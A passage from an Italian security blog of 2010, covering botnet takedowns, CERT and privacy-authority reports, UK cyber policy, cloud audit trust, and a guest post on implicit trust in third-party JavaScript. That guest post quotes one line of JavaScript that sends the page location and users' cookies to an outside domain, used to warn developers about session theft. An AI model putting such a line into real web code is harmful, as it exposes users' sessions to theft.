Primo, la necessità di una reazione collettiva e partecipata a questo problema del miglioramento della sicurezza su Internet: è il tempo di investire tempo e risorse per uno sforzo internazionale sul tema, con un impegno trasversale da parte di tutti i più importanti vendor di tecnologia e in grado di coinvolgere i dovuti interlocutori socio-politico-economici, perché la scala del problema e l’importanza della sua risoluzione richiede di superare i particolarismi nazionali o commerciali. Il cosiddetto “cyber crimine” ha già ampiamente dimostrato come possa essere efficace organizzarsi in modo strutturato, mentre la cosiddetta “società civile”, a vari livelli, mi sembra ancora abbastanza disunita se non litigiosa (c’è poi anche chi ancora ritiene che si possa produrre sistemi software invulnerabili e a prova di hacker, e fa di questo un tema cardine della propria politica commerciale...ma questo è un altro tema che non abbiamo modo di sviscerare in questa sede).

Secondo, il fenomeno delle Botnet e l’analisi delle minacce più recenti hanno dimostrato che la sicurezza complessiva di Internet non è scorrelata al livello di sicurezza dei nostri singoli PC, anzi è profondamente connessa, e quindi non si può pensare di risolvere il primo aspetto se non si governa il secondo. Non è la quarantena il cuore di tale modello, quanto la necessità di una infrastruttura di remediation efficace ed efficiente che riesca ad individuare e sanare (con aggiornamenti di tutte le componenti applicative presenti sui device) i dispositivi che per diversi motivi fossero in uno stato di rischio, per sé e quindi per tutti.
Da qui la logica proposta di presentare un modello che, mutuando i meccanismi da una architettura esistente in un ambito aziendale (mi sto riferendo alla tecnologia di Network Access Protection), provi ad indicare un percorso fattibile di soluzione del problema dal punto di vista tecnico. Queste tecnologie sono già ben funzionanti e già predisposte all’interoperabilità tra piattoforme eterogenee, quindi stanno già di fatto dimostrando la fattibilità tecnica di tale modello e la sua applicabilità non esclusiva a specifiche piattaforme.
Certo non sono banali i problemi posti dalle complessità non tecniche, costi, responsabilità, normativa, tutela della privacy (anche se quest’ultimo punto, di nuovo, la tecnologia sta già dimostrando di poter dare soluzioni fino ad ora inimmaginabili, penso a U-Prove...), ma questi bastano a fermare questo percorso che è urgente intraprendere in modo collettivo?

Conto sul vostro contributo per procedere nella discussione, voi cosa ne pensate?"

venerdì 5 novembre 2010

Il nuovo report del CERT svizzero

Da qualche giorno MELANI, il CERT svizzero, ha pubblicato l'undicesimo rapporto semestrale sulla sicurezza informatica. Come ormai ci hanno abituato i bravissimi esperti svizzeri il rapporto è davvero una preziosa risorsa per tutti coloro che lavorano nel campo della prevenzione e gestione degli incidenti informatici.

Ciò che rilevano al CERT svizzero è che nel primo semestre del 2010 è stato registrato a livello mondiale un aumento dei casi di spionaggio e di furto di dati informatici, inoltre molti siti web e reti informatiche vengono manomessi da criminali allo scopo di infettare gli ignari utenti ed infine si registra una significativa presenza di attacchi che hanno scopi politici.

Tra le molte riflessioni degne di nota, ho trovato molto interessante la considerazione in merito agli impatti della rapida proliferazione degli smartphone e degli accessi mobili a Internet. MELANI infatti si sofferma sulla opportunità di tenere conto del fatto che i provider di telefonia mobile utilizzano la Network-Address-Port-Translation (NAPT), ovvero, quella tecnica che consente a migliaia di utenti di utilizzare il medesimo indirizzo IP con porte diverse. Ciò ha un grande impatto sulle modalità con le quali sono registrati le attività degli utenti su Internet, infatti, di norma, per identificare un collegamento e il suo utente sono necessari l’indirizzo IP, la data e l’ora. Questi dati sono peraltro memorizzati regolarmente nei file di log dei servizi Web. Però per identificare un utente mobile dovrebbe essere noto anche il numero della porta. Questo dato viene però registrato raramente. MELANI afferma quindi che si terrà conto di questa circostanza nel quadro della revisione in corso della legge federale del 6 ottobre 2000 sulla sorveglianza della corrispondenza postale e del traffico delle telecomunicazioni (LSCPT) e nella struttura delle relative disposizioni di esecuzione. Molto interessante...

Infine MELANI riporta i risultati dell'attività di verifica sui siti svizzeri alla ricerca di possibili infezioni di malware. I dati pubblicati sono confortanti, infatti nei mesi da giugno ad agosto 2010 su 237.000 pagine web esaminate solo 148 sono risultate infette.

Insomma un gran bel lavoro... e il CERT italiano che cosa ha pubblicato in merito al primo semestre 2010?

Che sbadato, dimenticavo... in Italia non abbiamo un CERT nazionale.

Consoliamoci leggendo il rapporto svizzero!

martedì 26 ottobre 2010

Bredolab: una nuova botnet KO

Mikko Hypponen di F-Secure ha ripreso il comunicato del "High Tech Crime Team" olandese che ha annunciato ieri una azione di contenimento della botnet Bredolab, una più pericolose in circolazione.

Bredolab è un trojan polimorfico molto complicato, innalzato agli onori della cronoca soprattutto per essere stato utilizzato in campagne di attacco contro gli utenti di Facebook e MySpace. In realtà Bredolab è stato  utilizzato per infettare gli utenti secondo quasi tutti gli schemi conosciuti, utilizzando tecniche che spaziano dagli attacchi di tipo drive-by, al più classico invio di e-mail fino a sofisticate tecniche di social engineering. La botnet di Bredolab è nota per essere collegata a campagne di spam e di diffusione di falsi software antivirus. Una volta installato, Bredolab prende il completo controllo del computer infetto e viene usato per ottenere informazioni sull'utente, tra cui le sue password e i suoi dati finanziari.

Tanto per quantificare un minimo l'estensione e la capacità di operare di questa botnet vi riporto i principali dati che sono stati raccolti nel corso delle indagini: la botnet era in grado di infettare 3 milioni di nuovi computer al mese e, quotidianamente, venivano inviate oltre 3,6 miliardi di e-mail contenenti il trojan.

La cronaca di ieri ci racconta che, a fine estate, dopo una serie di investigazioni del High Tech Crime Team, è emerso che questa botnet utilizzava numerosi server affittati da un rivenditore di LeaseWeb che è il più grande hosting provider in Olanda. LeaseWeb, informata dei fatti, ha pienamente collaborato alle indagini e alle successive fasi di contenimento della botnet. E' stato quindi costituito un team composto da LeaseWeb, dal Dutch Forensic Institute (NFI), da Fox-IT, una società di sicurezza  e dal GOVCERT.NL, il Computer Emergency Response Team olandese. Le attività di questo team si sono concluse ieri con il sequestro e la disconnessione da Internet di 143 server della rete di Comando e Controllo della botnet, rendendola di fatto inoffensiva.

Questa notizia va a supportare una nuova tendenza di contrasto alle botnet caratterizzata da un atteggiamento molto più offensivo rispetto al passato, infatti, dopo l'Operation B49 condotta da Microsoft e il "takedown" di Mariposa, si aggiunge un altro significativo tassello nella lotta contro le botnet. È però interessante notare che questa volta si farà un passo avanti rispetto alle altre operazioni di "takedown", infatti, è stato annunciato che sarà inviato un avviso agli utenti dei PC infetti che, al momento del login, riceveranno una informativa sullo stato di infezione del loro sistema. 

Probabilmente, per consentire l'invio di questo messaggio, sarà utilizzata l'infrastruttura stessa della botnet con una modalità di approccio che, appunto, non ha precedenti.

Insomma, un consistente passo avanti nella lotta alle botnet e una buona notizia per tutti noi.

sabato 23 ottobre 2010

Il Garante e la sicurezza della giustizia amministrativa

Qualche giorno fa è stata pubblicata la nuova newsletter del Garante Privacy in cui viene riportata, tra le altre notizie, una nota sull'esito di un ciclo di verifiche effettuate in collaborazione con il Consiglio di Stato e con il Tar del Lazio sullo stato di conformità alle regole privacy della giustizia amministrativa.

Nelle verifiche effettuate sono emerse alcune problematiche di "natura logistica":
- alcuni armadi, collocati nei corridoi delle segreterie e nei quali sono custoditi fascicoli processuali, sono privi di serratura
- alcuni faldoni, contenenti fascicoli processuali, si trovano nel corridoio di accesso all'archivio, al di fuori dei locali chiusi
- l'accesso alla sala server e alla sala ove sono collocati i gruppi di continuità, site presso la sede di Palazzo Spada in un'area separata dagli uffici, è possibile, rispettivamente, con badge non nominativo e con chiave fisica. Gli accessi non vengono registrati. E' istallata una telecamera che riprende l'area prospiciente l'ingresso ai locali

Inoltre sono emerse delle problematiche dal punto di vista della gestione informatica dei dati:
- le comunicazioni gestite da N.S.I.G.A. (Nuovo Sistema Informativo della Giustizia Amministrativa) fra le sedi della Giustizia amministrativa e gli accessi dei magistrati a N.S.I.G.A. da postazioni esterne agli uffici (cd. "scrivania del magistrato") avvengono attraverso il protocollo "http" non cifrato
- relativamente agli accessi a N.S.I.G.A. da parte degli utenti abilitati (magistrati e personale amministrativo), vengono tracciate le operazioni di scrittura, non gli accessi in sola lettura
- le password utilizzate dal personale per accedere a N.S.I.G.A. e al dominio della rete interna dell'amministrazione rispondono alle specifiche misure minime di sicurezza richieste dal Codice. Peraltro: 1) ogni password utilizzata per l'accesso a N.S.I.G.A. è composta da una parte del nome dell'utente che la utilizza; 2) relativamente alle password per l'accesso al dominio della rete interna dell'amministrazione, il sistema impedisce per ventiquattro volte agli utenti di ripetere una password già utilizzata;

Il Garante Privacy ha quindi stabilito che, nel termine di dodici mesi, oltre agli ovvi miglioramenti logistici, il sistema N.S.I.G.A. dovrà  implementare la cifratura delle comunicazioni telematiche provenienti dall’esterno (tramite l'adozione del protocollo "https"), la tracciatura di tutti gli accessi e di tutte le operazioni effettuate dagli utenti abilitati ed infine delle diverse policy per la gestione delle password. Tra le misure logistiche, risultano particolarmente interessanti quelle riguardanti la sala server e la sala dove sono collocati i gruppi di continuità che dovranno essere costantemente monitorati, eventualmente anche attraverso un impianto di videosorveglianza interno, e i cui accessi dovranno essere registrati (tramite log) e consentiti solo con badge nominativi.

Questa serie di prescrizioni mi fa riflettere, ancora una volta, sul ruolo e sull'approccio adottato dal Garante privacy italiano. Mi chiedo infatti, se sia opportuno che il Garante esprima direttamente delle soluzioni vincolanti che devono essere adottate (come ad esempio l'adozione del protocollo https per gli accessi dall'esterno o l'adozione di badge nominativi), piuttosto che indicare le problematiche riscontrate associate ad una generica indicazione per la risoluzione. Insomma, trovo che sarebbe più appropriato un approccio più neutro, simile ad esempio a quello adottato dagli auditor nelle verifiche di certificazione che, in presenza di "non conformità", si limitano a darne una descrizione e a descrivere l'approccio da adottare per risolvere la problematica ma non entrano nella specifica indicazione della soluzione da adottare, anche perché, guardando le cose dall'esterno, a volte, si possono effettuare scelte che non sono le migliori.

A mio giudizio, invece, il dato positivo è che il Garante è riuscito a ricavarsi un ruolo che gli consente di interfacciarsi con altre autorità e sottoporre a valutazione critica le scelte effettuate da quelle autorità.

Insomma, abbiamo una risposta ad una delle più classiche domande... Qui custodiet custodes? (Chi controlla i controllori?)... ovvio... il Garante!!

mercoledì 20 ottobre 2010

Inghilterra - Italia 650milioni-0

"The security of our nation is the first duty of government. It is the foundation of our freedom and our prosperity." 

Queste parole sono l'inizio della "National Security Strategy" britannica presentata dal Primo Ministro al Parlamento. Chiunque di voi le legga è in grado di comprenderle profondamente e capire che sono una verità incontestabile. Chi potrebbe dirsi in disaccordo? 

Quanto mi piacerebbe che un documento sulla sicurezza prodotto dal nostro governo si aprisse con una frase come questa; sarebbe veramente il momento di pensare che abbiamo fatto un salto di qualità.

Scorrendo il testo si legge che al documento di strategia è collegato un secondo documento dal titolo "The Strategic Defense and Security Review" che descrive come saranno strutturate le Forze Armate, la polizia e le agenzie di intelligence al fine di contrastare le minacce presenti e future in modo efficace, al pari di come sono state fronteggiate quelle del passato. Ebbene in questo secondo documento si può trovare, al paragrafo 4.C.3, che il governo britannico introdurrà un programma nazionale di cyber security per colmare il divario tra le esigenze di una moderna economia digitale e la rapida crescita dei rischi associati al cyber spazio. Il National Cyber Security Programme sarà supportato da uno stanziamento di 650 milioni di sterline in quattro anni. Il successo di questo programma - prosegue il documento - dipende anche dal ruolo fondamentale che il settore privato è chiamato a svolgere e dalle partnership pubblico privato che si struttureranno a supporto del programma stesso

Ed infine l'apoteosi... Attraverso questo programma, noi (il governo britannico):
- revisioneremo l'approccio del Regno Unito nei confronti della criminalità informatica. Creeremo un unico punto dove il pubblico e le imprese possano segnalare i crimini informatici
- porremo rimedio alle carenze del Regno Unito nella rilevazione e nella difesa contro gli attacchi cyber provenienti da terroristi, stati o da altri soggetti ostili
- creeremo una nuova organizzazione, il UK Defence Cyber Operations Group, all'interno del Ministero della Difesa per garantire una coerente integrazione delle attività relative alla cyber security in tutto lo spettro delle operazioni di difesa
- porremo rimedio alle carenze della sicurezza informatica delle infrastrutture critiche da cui dipende il Regno Unito; la leadership strategica e la supervisione regolamentare saranno forniti da una nuova unità chiamata Cyber Infrastructure Team realizzata presso il Department for Business, Innovation and Skills
- sponsorizzeremo una ricerca di lungo periodo sulla cyber security, realizzata da strutture pubbliche e private, per costruire e mantenere l'eccellenza in questo settore
- introdurremo un nuovo programma di educazione e di sviluppo delle competenze al fine di promuovere un approccio più preventivo alla sicurezza informatica in tutto il Regno Unito 
- continueremo a costruire le nostre alleanze sulla cyber security, anche attraverso il rapporto già forte con gli Stati Uniti, con la creazione di nuove relazioni con le nazioni che hanno delle affinità di approccio

Se tutto questo non vi bastasse provate a leggere il resto del documento... c'è quasi tutto quello che ogni esperto del settore vorrebbe leggere...

E già, questa partita la stiamo perdendo 650 milioni di sterline a zero... speriamo che qui da noi qualcuno si svegli prima di diventare veramente... irrilevanti.

martedì 19 ottobre 2010

Matteo Meucci - Fiducia Cieca

Sono veramente lieto di ospitare il primo post della serie "Voci Amiche", ossia il primo post "esterno" che viene pubblicato sulle pagine di Punto 1. E' per me fonte di ulteriore piacere il fatto che la prima persona che si è voluta cimentare con questa iniziativa sia Matteo Meucci, fondatore e presidente del capitolo italiano di OWASP e CEO di Minded Security. In fondo al post trovate una breve biografia di Matteo.

Bene, bando alle ciance...

"Fiducia Cieca" di Matteo Meucci

Che direste di qualcuno che quando incontra una persona per la prima volta, le stringe la mano e, subito dopo, in seguito ad una semplice domanda, fornisce automaticamente tutti i suoi dati e le sue informazioni personali?

E’ uno sprovveduto? E’ vittima di un raggiro?

Ora, a meno che questa ipotetica persona non sia davanti ad un pubblico ufficiale, le domande che di norma si dovrebbe porre prima di fornire informazioni sono: come mai questa richiesta? Che uso verrà fatto dei miei dati?

L’esperienza ci ha insegnato che la fiducia è un legame che si crea e si consolida nel tempo, sulla base della conoscenza reciproca.

Se tutto questo è chiaro e pacifico nelle interazioni tra persone, questi criteri di prudenza sono incredibilmente trascurati nelle interazioni tra applicazioni. Infatti il punto di integrazione tra applicazioni web complesse risulta essere ad oggi una delle problematiche maggiormente sottovalutate. Per questo mi sembra utile approfondire e analizzare le conseguenze della facilità con cui i responsabili applicativi forniscono un “trust implicito” verso tutti i confini delle applicazioni che si stanno realizzando.
Nel mondo applicativo, durante la fase di design ed implementazione del software, purtroppo, si tende a fornire un trust implicito verso tutti i confini applicativi, ovvero ci si focalizza (quando lo si fa) solo sulla sicurezza del core dell'applicazione che si sta sviluppando senza pensare a tutte le possibili interazioni che il nostro software dovrà gestire.

Il primo aspetto di trust implicito è relativo al fatto che tutto quello che proviene dagli utenti dovrebbe essere correttamente validato prima di essere processato lato server; sappiamo che questo è il problema più annoso nel mondo delle applicazioni web ed è un problema conosciuto. 

Quello che viene di norma molto sottovalutato riguarda gli altri aspetti di trust implicito e cioè:
- la comunicazione tra applicazioni: quando è necessario inviare delle informazioni dall’applicazione verso un database o altre applicazioni, spesso si sottovaluta la necessità di autenticare la richiesta e mantenere riservati i dati in transito. Questa trascuratezza, tra l’altro, espone anche a problematiche di privacy. (Per un approfondimento si veda la OWASP Top 2010, paragrafo A9 – Insufficient Transport Layer Protection. )
- l'utilizzo di piattaforme o di librerie open source: molto spesso vengono utilizzate piattaforme liberamente disponibili o librerie open source dimenticandosi che anche queste fanno parte dell’applicazione e che dovrebbero essere verificate così come il codice custom sviluppato. Il fatto che una piattaforma sia open source non significa che siano state correttamente eseguite tutte le necessarie verifiche di sicurezza prima del rilascio.
- l'import di componenti da terze parti: questa è la nota più dolente. Ad oggi non c’è nessuna sensibilità su questo tema. La maggior parte delle applicazioni Internet importa componenti esterni (come ad esempio banner in flash) trattandoli come una parte separata, non pensando, invece, che una possibile vulnerabilità su questo componente si ripercuoterà negativamente sulla sicurezza di tutta l’applicazione. All’interno di questa problematica il caso Javascript è certamente il più allarmante: la maggior parte dei siti Internet carica Javascript da siti di terze parti fornendo ancora una volta un trust implicito verso domini esterni. 
Questo è disarmante! 
In caso di compromissione del dominio della terza parte anche la sicurezza del nostro sito potrebbe essere compromessa ed inoltre un attaccante potrebbe eseguire azioni malevole direttamente sui browser degli utenti che utilizzano il nostro sito semplicemente modificando il codice Javascript che, con tanta faciloneria, abbiamo portato all’interno del nostro dominio applicativo.

Facciamo un esempio pratico… avremo un utente, il nostro sito, lo script e il sito della terza parte. Il flusso tipo prevede che gli attori interagiscano secondo il seguente schema:
- il browser dell’utente si collega al nostro sito
- il nostro sito richiama uno script memorizzato sul dominio terzaparte.it
- il dominio terzaparte.it fornisce il codice al nostro sito

Supponiamo che il codice JavaScript comprenda la seguente linea di codice:
sendTrack("url="+location+"&cookies="+document.cookies)
dove sendTrack è una comune funzione che invia, così come è stata pensata, le informazioni degli utenti verso terzaparte.it che, come tanti siti, traccia gli utenti che si collegano. Ebbene, è sufficiente questo codice per compromettere la riservatezza del cookie di sessione dell’utente: tale funzione, infatti, invierà al sito terzaparte.it il contenuto dei cookie dell’utente. Questo significa che il dominio di terza parte avrà a disposizione tutti i cookie di sessione degli utenti autenticati sul nostro sito compromettendo di fatto la sicurezza dell’applicazione.  
Inoltre teniamo presente che il codice JavaScript che viene eseguito sul browser dell’utente ha accesso al Document Object Model (DOM). Nel caso in cui vi siauna mancanza di un controllo molto stretto sulle modalità di utilizzo di un insieme di funzioni Javascript e i flussi di dati sono controllati da un attaccante, si può configurare una situazione molto pericolosa nota come DOM Based Cross Site Scripting. (E’ possibile approfondire questa vulnerabilità su OWASP o sul DomXSS Wiki:  curato da Stefano Di Paola).

Questi, sono solo un paio di esempi reali di trust implicito che può causare problemi di sicurezza del software: e voi quale livello di fiducia date al codice sviluppato da una terza parte?


-----------------------------------------------------

Matteo Meucci:
Laureato in Ingegneria Informatica presso l’Università degli Studi di Bologna, è attualmente CEO di Minded Security con più di 9 anni di esperienza nel campo dell’Information Security. Precedentemente fa parte del team della Security Practice europea di BT-INS, con focus su attività di Ethical Hacking e Application Security; responsabile della divisione Application Security presso una realtà romana e Application Security Consultant presso CryptoNet.

Dal 2005 Fondatore e presidente del Chapter italiano del progetto OWASP (Open Web Application Security Project) è responsabile della metodologia OWASP per la verifica di sicurezza degli applicativi web (OWASP Testing Guide). Possiede la certificazione CISSP e CISA.

Ha pubblicato diversi articoli sulla Web Application Security su riviste ed ezine quali Hackin9, ICT Security, La Repubblica, il Sole 24 Ore, ISACA Roma newsletter, Sistemi di Telecomunicazioni. È relatore presso EusecWest, Infosecurity, IDC European Banking Conference, OWASP Conferences in Milan, Rome, London, Boston, ABI Banche e sicurezza, Firenze Tecnologia, ISACA, SMAU e presso i Master
Universitari della Bocconi di Milano, La Sapienza Roma, Almaweb di Bologna.

Punto 100: considerazioni e novità

E siamo arrivati a cento post...

Un buon momento per fare alcune considerazioni e un primo bilancio. 

L'iniziativa di Punto 1 sinora mi ha dato più soddisfazioni di quante avrei immaginato, sia dal punto di vista della creazione di un network di persone che frequentano il blog e che commentano i post sia dal punto di vista degli scambi di opinioni che si sono generati "a lato" del blog stesso. Mi sembra perciò arrivato il momento giusto per chiedere a chi passa un po' del suo tempo a leggere ciò che scrivo, cosa vorrebbe cambiare di questo blog e cosa vorrebbe trovare che invece al momento non c'è... per cui fatevi sotto e scrivetemi la vostra proposta!

Per quanto mi riguarda, l'idea è di lanciare un paio di nuove iniziative...

la serie "Voci Amiche", ossia post scritti da persone che stimo e apprezzo e che proporranno degli argomenti nuovi o degli approfondimenti su tematiche specifiche
la pagina "Tweets", in favore della persistenza dei contenuti di valore, dove raccoglierò alcuni contenuti tratti da Twitter organizzandoli per argomento in modo che siano consultabili nel tempo e non vengano "bruciati" nel breve volgere di un'ora  come tutti i gli altri tweet

Nei prossimi giorni vedrete queste novità...

Infine, sta per iniziare una collaborazione con "Sicuramente", il blog del Clusit, sul quale pubblicherò alcuni post e metterò dei rimandi ai contenuti di Punto 1. La logica, per quanto possibile, sarà quella di evitare le duplicazioni dei contenuti e quindi gestire le pubblicazioni con dei link tra i due siti in modo da consentire ai lettori di avere comunque accesso a tutte le notizie.

Spero che queste novità vi possano interessare e che possiate continuare ad apprezzare Punto 1 e, se non lo apprezzate... ditemelo!!

lunedì 11 ottobre 2010

MUMBLE - Cloud vuol dire fiducia

Ebbene si, ho biecamente giocato con il noto slogan di un'industria alimentare. 
A mia scusante posso solo anticiparvi che i motivi ci sono e più avanti ve li esporrò.

Ma cominciamo con ordine... 

Ieri l'amico Feliciano Intini ha segnalato una notizia che mi ha fatto riflettere parecchio. In estrema sintesi la notizia è che Adam Swidler, un product marketing manager di Google, nel corso di un keynote tenuto al "Mass Technology Leadership Council Security Summit", ha affermato che i clienti dei servizi cloud di Google che si preoccupano della sicurezza faranno meglio ad abituarsi al fatto di non poter controllare direttamente la sicurezza dei loro dati. Infatti, il meglio che Google può fare è condividere i propri obiettivi di controllo e di sicurezza con chi ha preventivamente firmato un accordo di riservatezza.

Adam Swidler ha spiegato che molti clienti si preoccupano della sicurezza garantita dai fornitori di servizi di cloud computing ma non esiste un modo soddisfacente per consentire una valutazione diretta da parte loro. "Noi non consentiamo ai clienti di effettuare degli audit analoghi a quelli che potrebbero realizzare nella loro infrastruttura. Dovrete estendere un certo livello di fiducia nelle verifiche di terza parte."
Infatti, secondo Swidler, un fornitore di servizi cloud non avrebbe il tempo di lasciare che ogni cliente controlli la sicurezza dei propri dati ed inoltre non sarebbe possibile consentire che le misure di sicurezza adottate possano diventare di pubblico dominio in quanto gli attaccanti avrebbero degli enormi vantaggi.

Questa notizia, dunque, mi ha fatto riflettere. Non tanto perché sia un qualcosa che non ci si aspetta, ma piuttosto per la reazione che suscita... Ma come, non posso controllare come i miei dati e le mie applicazioni vengono gestiti? E allora quali strumenti ho? Se non si può fare audit, come farò a fidarmi?

E poi mi è venuto in mente che qualcosa di molto simile è parte della nostra vita quotidiana; proprio sui temi che ci stanno maggiormente a cuore. La nostra salute. A meno che non si appartenga a quella minoranza che mangia solo i frutti della terra che coltiva personalmente, abbiamo tutti firmato un'enorme cambiale in bianco con l'industria alimentare (ecco spiegato il titolo del post) che prepara i cibi che consumiamo e non consente certo delle ispezioni da parte dei consumatori. Quindi, l'affidarci a terzi per la gestione dei dati non dovrebbe essere un salto culturale così grande come invece viene percepito. E perché troviamo la cosa più preoccupante che mangiare delle cose di cui sappiamo solo ciò che viene dichiarato dal produttore?

Azzardo delle ipotesi.

1 Problema di  percezione
Nel mondo dell'industria alimentare ci si illude che l'approccio non sia tecnologico. Nelle cloud lo strato tecnologico non essendo compreso (o in alcuni casi non essendo comprensibile a causa di ciò che non dicono i fornitori) provoca grandi perplessità negli utenti

2 Problema di maturità
Le tecnologie alimentari sono diventate ormai un dato di fatto quotidiano, le cloud sono una grande rivoluzione "in fieri" e non siamo mai particolarmente favorevoli alle novità

3 Problema di regole
Nel mondo dell'industria alimentare ci sono regole codificate da tempo e precise responsabilità anche penali. Nel mondo delle cloud gli unici riferimenti, ancora acerbi per molti aspetti, sono le linee guida prodotte dalla Cloud Security Alliance, che peraltro non raggruppa neanche tutti i "grandi" (Amazon ad esempio è fuori) e il documento di valutazione del rischio prodotto da ENISA

4 Problema dei controlli
Nell'industria alimentare i controlli sono demandati alle forze dell'ordine che effettuano la necessaria vigilanza e deterrenza nei confronti dei produttori. Nel mondo cloud, al momento, esistono solo le autodichiarazioni, visto che approfonditi controlli di terza parte non sono/saranno consentiti

Proseguendo nel ragionamento, alcune risposte (parziali) potrebbero arrivare proprio dal modello alimentare... ad esempio, demandare ad un'autorità riconosciuta dalle parti (visto che la transnazionalità delle cloud è di impedimento all'azione di una specifica autorità nazionale) l'attività di auditing rispetto a standard riconosciuti e approvati potrebbe essere un approccio utile. E poi, se provate a fare una ricerca su Google sullo slogan che fornisce il titolo a questo post troverete che molte pagine sono dedicate ad un fatto di cronaca legato proprio alla presunta violazione di quelle regole di produzione che ha caratterizzato l'azienda dello slogan. Allora, una possibile fonte di riequilibrio per il mercato delle cloud che certamente non si sta evolvendo nel senso delle garanzie per gli utenti, potrebbe venire proprio dalla federazione degli utenti e dalle pressioni che queste federazioni possono portare.

Queste certamente non sono le Soluzioni però mi piacerebbe confrontarmi con voi... che ne pensate?


http://www.wikio.it